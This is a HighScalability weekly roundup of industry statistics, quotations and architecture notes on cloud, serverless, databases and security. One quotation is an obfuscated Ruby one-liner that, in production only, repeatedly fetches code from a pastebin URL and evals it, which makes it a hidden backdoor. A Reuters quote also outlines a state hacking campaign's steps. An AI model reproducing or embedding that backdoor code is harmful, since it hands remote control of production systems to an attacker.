
Stuff The Internet Says On Scalability For July 19th, 2019

Wake up! It's HighScalability time—once again:




Do you like this sort of Stuff? I'd greatly appreciate your support on Patreon. I wrote Explain the Cloud Like I'm 10 for people who need to understand the cloud. And who doesn't these days? On Amazon it has 52 mostly 5 star reviews (118 on Goodreads). They'll learn a lot and hold you in even greater awe.


Number Stuff:

  • 55%: Huawei devices have a potential backdoor. One device had 1,419 known vulnerabilities. On average Huawei devices had 102 known vulnerabilities inside their firmware. 8 different firmware images were found to have pre-computed authorized_keys hard coded into the firmware. 424 different firmware images contained hardcoded private SSH keys. On dozens of occasions, Huawei engineers disguised known unsafe functions (such as memcpy) as the “safe” version (memcpy_s).
  • 333: slides in Mary Meeker's 2019 Internet Trends report.
  • 55%: performance hit for applications compiled to WebAssembly.
  • $4.6B: global market for embedded AI in support of IIoT smart objects by 2024.
  • ~70%: Microsoft vulnerabilities are caused by C and C++ memory corruption bugs. 
  • $20: worth of one branded retweet.
  • $5B: Facebook fine for "privacy missteps".
  • £183m: British Airways fine for data breach.
  • 14,000: asteroids orbiting in the Solar System. 
  • 14th: Google's subsea cable from Portugal to South Africa.
  • 13-minute: power outage caused the loss of 6 EB (exabytes) of NAND flash.
  • $600k: take from ransomware attack on Florida city.
  • 100 billion: documents at Slack.
  • 1.9M: tax returns processed by the IRS in one hour. 
  • 2%: of the internet was mistakenly routed through a Pittsburgh, Pennsylvania steel mill because of a BGP error. 
  • 140,000: visuals of outer space are free to the public in @NASA's image library.
  • 6.3: hours per day spent on the internet by the average US person.
  • 40%: young people are online pretty much constantly.
  • 3.8B: Global internet users.
  • 8 million: events per second generated by the eBay fleet from more than 5,000 applications. 
  • 10-30%: reduction in Uber's HTTPS tail-end latencies after adopting UDP based QUIC.
  • 25-35%: reduction in performance with hyperthreading disabled on Intel’s 4 and 6-core CPUs

Quotable Stuff:

  • Alison Gopnik: So, you start out with a system that’s very plastic but not very efficient, and that turns into a system that’s very efficient and not very plastic and flexible. It’s interesting that that isn’t an architecture that’s typically been used in AI. But it’s an architecture that biology seems to use over and over again to implement intelligent systems. A good way of thinking about this strategy may be that it’s a way of resolving the explore-exploit tradeoffs that you see all the time in AI. 
  • @TeriRadichel: Liberty Mutual moved call center to AWS Serverless ~ 97% savings
  • @ChristinGorman: I'm going to spoil it for you because it's so damn important. Microsoft did a scientific study - based on MS Vista code and found that the best predictor of bugs was: ORGANIZATIONAL COMPLEXITY. More people = worse code. More departments = worse code. Higher turnover = worse code.
  • @zackkanter: Seems that an entire crop of startups from the last few years have been infected with Kubernetes. What a tragic tax on productivity and distraction from customer value.
  • Timothy Taylor: In reverse isochrestism, a new function is desired, but a familiar form is thought to be needed, perhaps to support the impression that no change of name is needed, and no novel threat exists. This is rather like skeuomorphism, the phenomenon that describes what happens when a new material supplants an old one and both nostalgia and familiar expectation modify the new one in favour of the old
  • 55873445216111: Semiconductor fabs require MASSIVE amounts of electric power. In fact, to the first approximation, 5-10% of the cost of a silicon wafer is purely the cost of the electricity consumption. Source: worked in finance dept managing fab spend
  • @davatron5000: The 2 hardest problems in programming are: 1. Let's not invest time and money in the new thing. 2. Let's not invest time and money in the old thing because a new thing is coming.
  • Sascha Segan: Verizon had a good run for the past five years with its nationwide LTE network, but AT&T has rocketed into the top spot this year. What the carrier calls 5G Evolution may not be 5G, but it's definitely a stride toward it. The big push to improve its 4G LTE network in preparation for 5G pays off big time for AT&T; it's America's fastest mobile network in 2019.
  • @JoeEmison: The trajectory we are on drives us more toward single service providers with differentiated services, not back out to least-common-denominator solutions that require us to implement all sorts of scaffolding.
  • @ben11kehoe: [email protected]_ now talking about how people anthropomorphize Roomba—people want their Roombas, which they’ve named, fixed by customer care rather than receive a brand new replacement one #reMARS
  • Neal Stephenson: I ended up having a pretty dark view of [the internet], as you can kind of tell from the book. I saw someone recently describe social media in its current state as a doomsday machine, and I think that's not far off. We've turned over our perception of what's real to algorithmically driven systems that are designed not to have humans in the loop, because if humans are in the loop they're not scalable and if they're not scalable they can't make tons and tons of money.
  • @timbray: This group did a Java vs #Golang bake-off for a high-TPS microservice: “Java was slower, but tracking reasonably well until about ~P98.  Then it started to diverge by a good margin.  By P99.9 it was really bad.”
  • @Dominos_AU: Our #1 customer complaint is “My pizza doesn’t look like it should!". So, we introduced DOM Pizza Checker - world-first technology which is set to drastically improve product quality and consistency throughout all Domino’s stores in Australia and New Zealand!
  • @badnetworker: 1999: there are millions of websites all hyperlinked together  2019: there are four websites, each filled with screenshots of the other three.
  • @pbailis: DAWNBench entries continue to heat up – a recent favorite: Baidu trained CIFAR-10 to 94% accuracy for $0.02 on their public cloud 
  • Tomdarkness: So we made the terrible decision of migrating to Aurora Postgres from standard RDS Postgres almost a year ago and I thought I'd share our experiences and lack of support from AWS to hopefully prevent anyone experiencing this problem in the future.
  • @mjpt777: After years of working on distributed systems I still keep being surprised by how easy it is to miss potential outcomes. The state space is too vast for the human brain.
  • @colmmacc: I think it was maybe 3 months between deciding we needed sites and actually having everything signed and ordered, and another 6 weeks before hardware would come and the space actually be usable. This was really really fast and involved me pestering a lot of people.
  • @tacertain: I was the lead engineer on EBS for its first four years, so maybe I am hypersensitive to correlated hard drive failure. However, in my home setup, I bought two drives from each of two manufacturers. After a while, I discovered that monitoring hadn't been set up correctly
  • Venki Ramakrishnan~ You have to see something to understand it. That's a thread through history. Being able to see the next level of detail transforms fields. Structure determines function. 
  • Freeman Dyson: Brains use maps to process information. Information from the retina goes to several areas of the brain where the picture seen by the eye is converted into maps of various kinds. Information from sensory nerves in the skin goes to areas where the information is converted into maps of the body. The brain is full of maps. And a big part of the activity is transferring information from one map to another.
  • @BloombergNEF: #EVO2019: "Battery prices will continue to fall. As a result, we expect price parity between EVs and internal combustion vehicles (ICE) by the mid-2020s in most segments, though there is wide variation between geographies and vehicle segments."
  • @ajaynairthinks: As an industry we should really be using the terms “monoservice” or “polyservice” depending on whether a service does one thing or many. “#microservice” implies size/complexity has something to do with purpose, which it doesn’t.  Huge fan of mono services btw.
  • Netflix: Resource allocation problems can be efficiently solved through a branch of mathematics called combinatorial optimization, used for example for airline scheduling or logistics problems.
  • Yan Cui: At Yubl, as we migrated most of our services to serverless, we were able to disband the DevOps team. The developers were more than capable of taking on the remaining ops responsibilities. As the paper discussed, the pay-per-invocation model doesn’t fit some workloads. In these cases, you can end up paying a lot more with Lambda than with containers or VMs. However, when you calculate the true cost of a solution, you need to factor in the cost of engineers you need to support the solution. At the risk of generalising, I would wager that for 90% of companies, the balance is heavily tipped towards the cost of engineers.
  • M. Thomson: Time and experience shows that negative consequences to interoperability accumulate over time if implementations apply the robustness principle.  This problem originates from an assumption implicit in the principle that it is not possible to affect change in a system the size of the Internet.  That is, the idea that once a protocol specification is published, changes that might require existing implementations to change are not feasible.
  • @jeremy_daly: I've been spending a lot of time lately with @dynamodb in my #serverless applications, so I thought I'd share my surefire guide to migrating to it from #RDBMS. So here is… How to switch from RDBMS to #DynamoDB in *20* easy steps… (a thread). STEP 1: Accept the fact that http://Amazon.com  can fit 90% of their retail site/system’s workloads into DynamoDB, so you probably can too.
  • @mattklein123: Our industry tends to fetishize the technical architectures of companies like Google, Netflix, etc. They have built some impressive tech to solve rare scaling issues, so this is not surprising. However, does your company/system need similar solutions? Probably not...
  • crehn: Nothing bad with SSH per se, but building your infrastructure in a way that makes ad-hoc remote changes unnecessary is something to strive for. For anything but small deployments, automation, immutability and reproducibility will keep you sane. Less moving parts, things don’t suddenly change, easy to audit, easy to rollback, etc.
  • @tacertain: If you're wondering what "P-four-nines" means, it's the latency at the 99.99th percentile, meaning only one in 10,000 requests has a worse latency. Why do we measure latency in percentiles? A thread about how it came to be at Amazon... In 2001, I was managing the Performance Engineering team. We were responsible for the performance of the website, and we were frustrated. We were a few engineers fighting against the performance entropy of hundreds of developers adding features to the web site. Latency kept going up, but we had a big problem: how to convince people to care. The feature teams had web labs that could show "if we add feature X to the page, we get Y more revenue." If that feature added 100ms to page latency and our only counter was "but latency is bad," our argument didn't carry the day. So we had to figure out how to make our argument stronger.
  • @emileifrem: Adobe used 125 MongoDB servers to run their activity feed. It was replaced by 48 Cassandra servers. Now it runs on 3 (THREE!) servers of Neo4j. With more data (yet smaller disk footprint), higher load and more functionality. The scalability of a native graph database. 💪💪💪
  • @postwait: For the last time, there is a nearly 100% chance that the clever solution that you've thought about for one day or one week or even one month is not as good as the approach of a grad student that has rigorously analyzed it for 3 years. Use their work, I'm tired of your crap.
  • @ericlaw: "There are always exactly two systems: The deprecated one that no one should use any more, and the new one that isn't ready yet."
  • @Jake_Bernstein: In 2018 the number of people  in the world older than 64 years old surpassed the number of children under 5 years old. This was the first time in history this was the case.
  • @colmmacc: "Error budgets" are the god-damn worst idea I've heard of in recent years. SLAs should be realistic goals about what we can achieve with our current techniques and tools, not permission to fail a certain amount.
  • Yancey Strickler: The web 2.0 era has been replaced by a new “Web²” era. An age where we simultaneously live in many different internets, whose numbers increase hourly. The dark forests are growing.
  • groby_b: It's depressing the term has become that. "Strong opinion" used to mean "I've looked at the arguments and the counterarguments closely, and I've developed the arguments to the point where I'm convinced this is the right answer". Not "I shout the loudest about it". And "weakly held" meant "I am willing to believe there's data out there showing I'm wrong, and I will look at any new data with an open mind". Not "I'll flip if somebody shouts louder".
  • @_jayphelps: Nurses interviewing for a job first are asked to draw the molecular structure of various medications, then usually they’ll have them start an IV but require that it isn’t done on the arms or legs. Lastly, they usually wrap up with brain surgery. None of this is true, I’m told.
  • @danilop~ An example of using Lambda functions for data processing at scale - 259 TB of uncompressed data processed in just under 20 minutes. The total cost of this run was $162 or about $0.63 per raw terabyte of data processed ($2.7 per compressed terabyte).
  • Dr Paul Calleja: The cost of running off-prem is significantly higher than the cost of running on-prem. With our cost models it's roughly 3x which is a big number when you are talking petascale.
  • nonlinearzone: I have designed ASICs and FPGAs for nearly 30 years, and seen the evolution of this technology first hand. To say that FPGAs have the wrong abstraction is to not understand what an FPGA is and what it is intended to accomplish. Transistors are abstracted into logic gates. Logic gates are abstracted into higher-order digital functions like flip-flops, muxes, etc. It is the mapping of algorithms/functions onto gates that is the essence of digital design. This is difficult work that would be impossible at today's scales (5-billion+ transistors) without synthesis tools and HDLs. And, given that an ASIC mask set costs 1MM+ for a modern geometry, it needs to be done right the first time (or at least the 2nd). Furthermore, the mapping to gates needs to be efficient, throwing more gates at a problem increases area, heat, and power, all of which need to be minimized in most contexts.
  • Ziprecruiter: AI created three times as many jobs as it destroyed in 2018. 
  • @nicoemoe: One driver asked to talk with a manager and was refused. As he was pleading his case, 4000+ rides, he was actually told by the Uber employee behind the desk, "There's over 100,000 other drivers out there. You're one less. Nothing I can do." /2
  • Memory Guy: Intel’s Optane has the opposite problem.  Optane’s price, half that of DRAM, means that it is priced to market — that’s the price that it can sell for.  Since it currently costs more than DRAM to produce Intel has to sell it at a loss.  
  • millstone: Exactly right. Microsoft was profoundly ahead of the curve! They were pushing their tablet/slate stuff 5+ years before the iPhone and iPad. Their key mistake was attempting to leverage Windows, which forced an awkward stylus mode driving a shoehorned desktop OS. Apple blindsided them with a better cellphone instead of a worse computer, and so it slotted in naturally. Microsoft could only conceive of Windows devices. Apple's big idea was to not make the iPhone a Mac. If anything, they overcorrected, dragged kicking and screaming into allowing apps at all.
  • @jwz: Surge Hacking. Uber, Lyft drivers causing artificial price surges: Every night, several times a night, Uber and Lyft drivers at Reagan National Airport simultaneously turn off their ride share apps for a minute or two to trick the app into thinking...
  • nonlinearzone: FPGAs grew out of PLD/CPLDs and allowed a significantly higher level of integration and board area reduction. They offered a way to reduce the cost of a system without requiring the investment and expertise required for an ASIC. But, FPGAs themselves are an ASIC, implemented with the same technology as any other ASIC. So, FPGAs are a compromise; the LUTs, routing, etc are all a mechanism to make a programmable ASIC. Compared to an ASIC, however, FPGAs require more power and can implement less capability for a given die size. But, they allow a faster and lower cost development cycle. To bring this back around, the LUTs and routing mechanisms are functions that have been mapped to gates. To use an FPGA, algorithms still need to be mapped onto the LUTs and this is largely the same process as mapping to gates. The best FPGA/ASIC abstraction we have today is a CPU/GPU.
  • @cloud_opinion: Oracle quarter results: Cloud Services and License Support revenues were $6.8 billion. While you guys were fighting over definition of Cloud, Cloudless, Serverless etc etc. This is also why AWS top execs are increasingly obsessed about Oracle - they know that Oracle sales reps are standing between them and customer.
  • runeks: The reason for Bitcoin’s design is precisely because a centralized/pegged alternative was tried and failed: https://en.m.wikipedia.org/wiki/Ecash. Facebook’s currency is not a successor of Bitcoin, it’s an inferior reincarnation of a failed predecessor.
  • ckastner: this current trend of "disrupting" the market by flouting or circumventing regulations may have worked for Uber, AirBnB and so on, but Libra might just be a step too bold. Unless Libra aims to uphold the same regulations that banks must, then at some point, I predict that there is a huge amount of trouble coming for them. Financial services can be both used and abused, and regulators have forced banks to address the abuse (eg: AML/KYC practices) to protect participants. Circumventing these regulations is equivalent to rolling back these protections.
  • Peter Robison: Rabin, the former software engineer, recalled one manager saying at an all-hands meeting that Boeing didn’t need senior engineers because its products were mature.
  • @kellabyte: I miss all the distributed systems debates from Boundary and Riak folks. Ever since both died the discussions have really dropped off in the community.
  • andygrove: This is for people who want to live in a future where we use efficient and safe system level languages for massively scalable distributed data processing. IMHO, Python and Java are not ideal language choices for these purposes. Rust offers much lower TCO compared to current industry best practices in this area.
  • Sam Altman: AI will probably most likely lead to the end of the world, but in the meantime, there'll be great companies.
  • Alex Ellis: With serverless 2.0, “you can run any code, whether binary or an HTTP server, any way you like — your laptop, on-premises, on OpenShift, in the cloud,” Ellis said. Kubernetes provides a common substrate.
  • Geoff Huston: It may well be that BGP will now last for as long as the Internet will last.
  • @rdonoghue: Reminded that the Microsoft ebook store closes next week.  The DRM'd books will stop working. I cannot believe that sentence. "The books will stop working." I keep saying it and it sounds worse each time.
  • Geoff Huston: Why has DNSSEC evidently failed? Was this a protocol failure or a failure of the business model of name resolution? The IETF's engagement with security has been variable to poor, and the failure to take a consistent stance with the architectural issues of security has been a key failure here. But perhaps this is asking too much of the IETF.
  • DHH: I suppose an ad like that is likely to attract people who are just as delusional as the authors of this job posting: "Of course I'm a 10x engineer willing to work for half the pay of a senior Valley engineer, because I'm going to make it up on these startup options!!".
  • Fred T-H: Communities tend to move in waves. Since hype phases can increase the size of a community tenfold or a hundredfold for a while, and that most people will take a curious look and then leave, most users in a community will tend to sit at the first rung and rarely make it past there. A fraction will make it a level above, and an ever shrinking fraction will make it above that one, and so on, until you have inner circles of experts at the highest levels.
  • @mjpt777: Non-volatile memory coming shortly with <100ns read and <300ns write plus byte addressable :-)
  • @mweagle: All teams are cognitively distributed. Some teams are geographically co-located.
  • jimmytucson: The quintessential insight from Moneyball was that walks were undervalued at the time. Now, thanks to a combination of camera tracking and radar, we know the exact location of every player and the ball at every millisecond of the game. This has given rise to a new, hyper-optimized style of play that can’t be replicated at other levels (minor leagues down to college, high school, and little league) due to the technology and analytical skills needed to harness this information. It’s starting to become clear that the optimizations slightly favor pitching and defense more than hitting, which some argue leads to a boring, “3 true outcomes” style of play.
  • John Lång: With DIVINE, defects were found in parts of the code base that had already been subject to hundreds of hours of unit tests, integration tests, and acceptance tests. Most importantly, model checking was found to be easy to integrate into the workflow of the software project and bring added value, not only as verification, but also validation methodology. Therefore, using model checking for developing library-level code seems realistic and worth the effort.
  • superpermutat0r: Hashed probably means that some features are mapped to a desired perceptron weight via a hash function. This serves as an implicit regularization and can be much more efficient (no need for a predetermined feature vector, sparse representation etc.). It's called hash trick in ML. Perceptron is a single layer NN. Dynamic predictor, a branch predictor that adapts to program input, not just some predetermined state (like a formula that was shown to be good enough for a collection of programs). 
  • Holland Michel: So what is Gorgon Stare and WAMI technology, how does it work? What Wide Area Motion Imagery does is expand the aperture. You can watch an entire city at once and zoom in on any one part of the imagery with a decent amount of detail, while still recording everything else. To do that is a tremendous technological leap, because you need an incredibly powerful camera. And that’s the other thing that sets them apart. They are tremendously powerful. It’s a way of seeing everybody all the time. Fundamental to liberal democracy is the ability to have sacrosanct private spaces. That is where the life of civil society exists. It is where our own personal lives exist, where we are able to pursue our dreams and passions. And it is often where we hold power to account. When you uncover those spaces, you fundamentally put all of those things at risk.
  • desc: I can see absolutely no positive value whatsoever in GraphQL for internal APIs. You're basically saying 'please, formulate any query you like, and I will waste years of my life trying to optimise that general case'. Seriously. For internal stuff you want to be as specific as humanly possible. You want to optimise the living f*ck out of that hot path thousand-times-a-second query, and build an entirely separate service to handle that particular URL if necessary.
  • @stuarthalloway: If you don't think managing state is tricky, consider the fact that 80% of all problems in all complex systems are fixed by rebooting.
  • @adrianco: Information on the weekend’s Google outage. It was an incorrectly scoped config change compounded by inability to observe and operate systems in a degraded state. https://cloud.google.com/blog/topics/inside-google-cloud/an-update-on-sundays-service-disruption … - I blogged about needing independent monitoring last year
  • James Beswick: “Security products are impossible to sell,” said a seasoned software veteran who had worked for two large security startups. “People won’t pay for it, they don’t understand the problem and never think they’ll get hacked. It’s impossible.” His short 10-second explanation mirrored everything we had seen.
  • Holland Michel: Get this: Amazon has a patent for a system to analyze the video footage of private properties collected by its delivery drones and then feed that analysis into its product recommendation algorithm. You order an iPad case, a drone comes to your home and delivers it. While delivering this package the drone’s computer vision system picks up that the trees in your backyard look unhealthy, which is fed into the system, and then you get a recommendation for tree fertilizer. There is tremendous value in the data that can be collected from the sky and people will seek to take advantage of that data.
  • Werner Vogels: With previous tools, auditors could not evaluate all of the code in all possible configurations, nor could they evaluate instances where keys were being used. With automated reasoning, customers can use a proof to examine the entire system for a certain value to gain insight into their environments. This creates a higher standard for security beyond today's advanced control measures, such as automated controls, preventive controls, or detective controls.
  • Barbara Tversky: place cells, single cells in the hippocampus that code places in the world, and grid cells next door one synapse away in the entorhinal cortex that map the place cells topographically on a neural grid. If it’s in the brain, it must be real. Even more remarkably, it turns out that place cells code events and ideas and that temporal and social and conceptual relations are mapped onto grid cells. Voila: spatial thinking is the foundation of thought. Not the entire edifice, but the foundation.
  • damnyou: GraphQL is bad for public APIs. It is good for precisely one thing: when the server and the client are controlled by the same entity, making updates to clients without having to add new internal APIs to the server. But this one thing is so useful for almost everyone that for internal APIs using GraphQL is usually a no-brainer. You actually don't want to be as performant as possible for internal APIs. There is a performance-flexibility trade-off involved and GraphQL lets you choose a different point on the Pareto frontier than maximum performance.
  • Arulraj, Pavlo: NVM upends the key design assumption underlying the WAL protocol since it supports fast random writes. Thus, we need to tailor the protocol for NVM. We designed such a protocol that we call write-behind logging (WBL). WBL not only improves the runtime performance of the DBMS, but it also enables it to recover nearly instantaneously from failures. The way that WBL achieves this is by tracking what parts of the database have changed rather than how it was changed.
  • Horusiath: AFAIK Facebook created GraphQL specifically for their gateway API - a service used as a facade between internal service mes(s/h) and their client - not for internal ones themselves. That's why things like schema stitching didn't come from FB - they weren't using it in that context.
  • Stripe: Stripe splits data by kind into different database clusters and by quantity into different shards. Each cluster has many shards, and each shard has multiple redundant nodes. We routinely exercise node failover logic during upgrades, maintenance, and failures.
  • @timverheyden: Like Amazon, Google employees are eavesdropping I discovered with my team. Confirmed by 3 sources and Google. One transcriber speaks out. 
  • makomk: The status bit that was set is supposed to mean "working without guarantee" - that is, the satellite may not meet the normal minimum performance level but is still in service. This specific combination of status bits corresponds to a status of "marginal", between full health and actually out of service. In order to actually mark the satellites as fully out of service they'd need to either replace the navigation data with dummy values or upload new navigation data with some additional status bits set
  • ChuckMcM: It reminds me of the adage "Workplace culture is what you do not what you say you do." I have met too many engineering managers over the years who thought they could cleverly have it both ways by exhorting quality is the highest priority while penalizing or criticizing engineers who objected based on quality or design metrics.
  • Stan Sorscher: According to Boeing’s annual reports, in the last five years Boeing diverted 92% of operating cash flow to dividends and share buybacks to benefit investors. Since 1998, share buybacks have consumed $70 billion, adjusted for inflation. That could have financed several entire new airplane models, with money left over for handsome executive bonuses.
  • a3n: I worked at Boeing from '88 to '94, writing test software. I liked it. I liked the people and the atmosphere. I always thought that when Boeing moved its headquarters from Seattle to Chicago that that was the end of something special. They went from being legendary Boeing to just another hyper-corporation who happens to make money doing X or Y or Z. In my opinion.
  • Ruby Prosser Scully: DNA isn’t the only molecule we could use for digital storage. It turns out that solutions containing sugars, amino acids and other small molecules could replace hard drives too. So far, the technology Rosenstein and his colleagues created is slow compared with electronic computers. However, it does have some advantages over DNA memory.
  • Paul Biggar: Speed of developer iteration is the single most important factor in how quickly a technology company can move.
  • asdfokd8: It seems to me like Aggregators vs Platforms is related to Products as Commodities vs Products as Brands. Aggregators win when products are anonymous commodities. Brands win when products are beloved. It seems like the trend (for many reasons: over-marketing, dis-satisfaction, dis-trust, a race toward the barely-legal) is toward products as brands: brands which are authentic and relational and participants themselves in the experience (that "get it").
  • snek: The thing I'm most excited about right now is WASI. It provides abstractions for system calls like fs, sockets, graphics, etc. But the best part is that the entire API is being designed with security and capabilities in mind. WASM binaries have to explicitly declare resources they want access to, or risk not being allowed to access them. (The application could also choose to further prompt the user, but i think in most cases they will just be denied). Once resources are acquired, we use unforgable handles to refer to them. It is a super cool and declarative way to make sure people know exactly what a wasm bin will try to access before it's even run.
  • Pete Warden~ There are over 250 billion embedded devices active in the world, and the number shipped is growing by 20% every year. They are gathering massive amounts of sensor data, far more than can ever be transmitted or processed in the cloud. Deep learning can run on a coin battery for a year.
  • ken: In other words, everyone from users to developers comes to depend on the status quo. The softness of software is a benefit during initial development, but mostly just a liability later. We value the status quo even more than quality.
  • @copyconstruct: One of the things we did really well at my previous job was dark traffic testing on newly *deployed* (not released) code. So we could capture production traffic and replay it in the exact same prod environment but against the newly *deployed* service.
  • Evgeni Gousev: There is a lot of talk about cloud ML, while ML at the smartphone level becomes more and more sophisticated. But if you look at the data, 90 percent of the data is in the real world. How do you connect all these cameras, IMUs, and other sensors and do ML at that level? Tiny ML is going to be big, and there is a real, urgent need to drive the whole ecosystem of tiny ML, including applications, software, tools, algorithms, hardware, ASICs, devices, fabs, and everything else.
  • Sally Ward-Foxton: A variety of techniques are used to keep power consumption down. This includes parallelisation, though not to speed things up; 8 cores are used to allow a slower clock speed, which allows the core voltage to drop, which saves energy (in practice, the clock frequency is adjusted dynamically, depending on workload)
  • orblumesea: tl;dr, US govt dysfunction is largely responsible for the lack of innovation in the area, as the military "owns" the prime 5g wireless spectrum. No US competitor exists because there's no competitive market that is allowed to exist.
  • Charlie Osborne: Petaflop capabilities now dominate the supercomputer landscape with all of this year's entries in the TOP500 now delivering these levels of performance or more.
  • nisten: I used to hate aws for how expensive their bandwidth and storage was, until I started actually using it last year. I think their new serverless stack is about to leave a lot of devops out of a job. You can set up a CI/CD pipeline in about half an hour with amplify, at the previous company I remember it taking a good 3 weeks to get CircleCi up and running properly. And then moving a microservice over to it is basically 1 command, a few options, mostly just copy over the config from your old express backend with a few changes, and you're done. It's insane. One other dev I've showed the lighthouse scores of the react stack I deployed on it even said "this should be illegal". And they're right, it's pretty much automated devops, the whole app now loads in 300ms. If you have server side rendering in your app the static content will automatically be cached on their CDNs.
  • Me: The best disguise for malice is incompetence.
  • Finite State Supply Chain: Overall, despite Huawei’s claims about prioritizing security, the security of their devices appears to lag behind the rest of the industry. Through analysis of firmware changes over time, this study shows that the security posture of these devices is not improving over time — and in at least one case we observed, it actually decreased. This weak security posture, coupled with a lack of improvement over time, obviously increases security risks associated with use of Huawei devices.
  • pxue: Amazon will win in the long run because at the end of the day it's all about if the "platform" can move merchandize or not. Amazon captures top of the funnel all the way down to personalized targeting. Shopify will never do that. they are just the tool to help you figure out all that yourself.
  • Tute Costa: def _!;begin;yield;rescue Exception;end;end_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}
  • Stephen Mihm: O’Mara argues persuasively that Fairchild “established a blueprint that thousands followed in the decades to come: Find outside investors willing to put in capital, give employees stock ownership, disrupt existing markets and create new ones.” But she makes clear that this formula wasn’t just a matter of free markets working their magic; it took a whole lot of Defense Department dollars to transform the region. Conveniently, the Soviets launched Sputnik three days after Fairchild was incorporated, inaugurating a torrent of money into the tech sector that only increased with the space race.
  • Saul Griffith: Without a doubt, there is at least ten-fold the good ideas in the minds of our young people that are currently being underfunded. And you want to get the money as directly as possible to the 25-year-olds, not their professors.
  • Charles Fitzgerald: But the biggest problem for IBM and Red Hat’s hybrid cloud software ambitions is not Cloud Foundry and Docker, but cloud hyperpowers AWS, Azure and GCP. Containers are fun and irresistible in the Lego-like metaphors they evoke, but they provide no higher-level services, and many will argue are just a brief layover on the way to serverless computing as the native programming model for the cloud. 
  • Terretta: On the contrary, I developed early merchant and payment gateway tech, and they absolutely do [fail open]. The scenario you describe is extraordinarily rare, which allows an arbitrage between CAP perfection and customer satisfaction. On a separate note, at any given time, some parts of our national payments ecosystem are “down”. There are enough players involved you have an appearance of resilience. You can see this in a mall, when one store’s card swipe terminals are down, and another’s are not, and almost never happens that all the stores are down at the same time. You can think of all these other players as an incidental circuit breaker pattern upstream of Visa. VisaNet itself is surprisingly unscaled, capable of only about 24,000 transactions per second. Twenty years ago, our gateway would hit 15,000 transactions per second real world use. To do that, we scattered/gathered across many independent paths into card networks and various merchant banks. 
  • dps: (Stripe CTO here)  We wrote this RCA to help our users understand what had happened and to help inform their own response efforts. Because a large absolute number of requests with stateful consequences (including e.g. moving money IRL) succeeded during the event, we wanted to avoid customers believing that retrying all requests would be necessarily safe. For example, users (if they don’t use idempotency keys in our API) who simply decided to re-charge all orders in their database during the event might inadvertently double charge some of their customers. We hear you on the transparency point, though, and will likely describe events of similar magnitude as an "outage" in the future - thank you for the feedback.
  • thejumpingtoad: Can confirm, AWS Glue is the tool of choice. We're offloading mainframe data into S3 bit by bit for a major financial institution.
  • NASA: The good news is that these simulations, combined with recent asteroid population data, suggest that city destroying Tunguska-level events occur with a frequency on the order of millennia, not centuries, as was previously thought. Chelyabinsk-level events occur roughly every 50 years, though.
  • jonathantn: I'd recommend setting the S3 bucket to intelligent tiering. Let S3 figure out which of the 6.5TB of data is "hot" and then it will automatically tier down the colder data and save you a bunch of money on your S3 bill. It takes 30 days for S3 to observe the access pattern and start tiering the objects. Also for safety make sure you have versioning turned on for the bucket. I recommend that once something is deleted let it go to Glacier Deep Archive for six months before it's finally purged. You can accomplish that with your Life Cycle policy. 
  • reuters: Teams of hackers connected to the Chinese Ministry of State security broke into the systems of eight major information technology service providers, Reuters has found, in a global cyber-espionage campaign known as “Cloud Hopper.” By hacking the technology service providers, the attackers were able to “hop” into client networks and steal reams of corporate and government secrets in what U.S. prosecutors say was an effort to boost Chinese economic interests. Infiltrate the service provider, usually via a so-called “spear phishing” email designed to trick employees into downloading malware or giving away their passwords. Once inside, map out the environment, establish footholds and find the target: the system administrator who controls the company ‘jump servers’ which act as a bridge to client networks. After passing through the “jump server,” map out the victim network and identify commercially sensitive data. Encrypt and exfiltrate the data, either directly from the client victim or back through the service provider.
  • alfiedotwtf: I worked on the floor with two teams. One (ours) built our apps and infrastructure the correct way. JIT. Get it working, get it working correct, get it working fast. And given the scale, it did wonders. The other team talked big and gave demos to higher ups and their higher ups and their higher ups. Web scale baby. And with that came the galactic infrastructure and all the buzzwords needed in order to run it. About 6 months later, they quit. They had spent their whole budget on astronaut architecture, so that they didn't have any money or time left to build the apps that were supposed to run on said infrastructure. "You are not FANG".

Useful Stuff:

  • Stack History: A Timeline of Slack's Tech Stack Evolution. A very cool presentation. It really gives you a way to look at changes over time. If you want to just jump to the current end state go here. Slack started in 2013 as a LAMP stack on AWS. They moved more into AWS over time. In 2018, Slack signed an agreement with AWS to spend at least $50 million a year over five years, for a total of at least $250 million. As of 2017, Slack was handling up to 1.4 billion jobs a day, at a peak rate of 33,000 jobs every second. They moved from Redis to Kafka for their job queue. Solr powers search at Slack. Web: a mix of JavaScript/ES6 and React. Desktop: Electron, to ship it as a desktop application. The core application and the API are written in PHP/Hack running on HHVM. The data is stored in MySQL using Vitess. Caching is done using Memcached and MCRouter. The messaging system uses WebSockets with many services in Java and Go. Load balancing is done using HAproxy with Consul for configuration. Most services talk to each other over gRPC. The voice and video calling service was built in Elixir. The data warehouse is built using open source tools including Presto, Spark, Airflow, Hadoop and Kafka.

  • Systems @Scale 2019 videos are now available. Delos: Simple, flexible storage for the Facebook control plane: a fundamentally new architecture for building replicated storage systems. Its modular, layered design provides flexibility and simplicity without sacrificing performance or reliability. 

  • API Gateway is likely going to be the first to go, followed by slimming down of data written to DynamoDB. Managing our own EC2s does not seem to save too much compared to Lambdas, based on early data. Hypertrack on How we built a serverless architecture with AWS
    • The problem with serverless architectures is they all look the same. You have boxes with names like lambda, GraphQL, DynamoDB, etc all pointing at each other. But how does it work in practice "when all hell breaks loose" and requests to one of your APIs "peaked at around 10k requests/second?" 
    • The good news: API latencies, uptime, and real-time performance were normal. The serverless architecture had scaled up automagically to handle the traffic that was 2-3 orders of magnitude higher than the day before. 
    • The bad news? It costs a lot. 
    • They now run hundreds of Lambda functions, store data in almost as many DynamoDB tables and leverage dozens of other Amazon services to make their platform work across their environments. 
    • The complexity of managing the high number of resources and wiring them up with each other is only manageable through strong automation. And defining all the infrastructure-as-code is critical to achieving that automation. 
    • They moved to Serverless framework for non-shared infrastructure parts.  
    • CircleCI is used to build, test and deploy continuously. 
    • They know unit costs by component, and that provides an input to the product, design and architecture thinking. The actual picture gets clearer with more usage, and key is to keep an eye on it. For all practical purposes, cost serves as a system level test/monitoring.

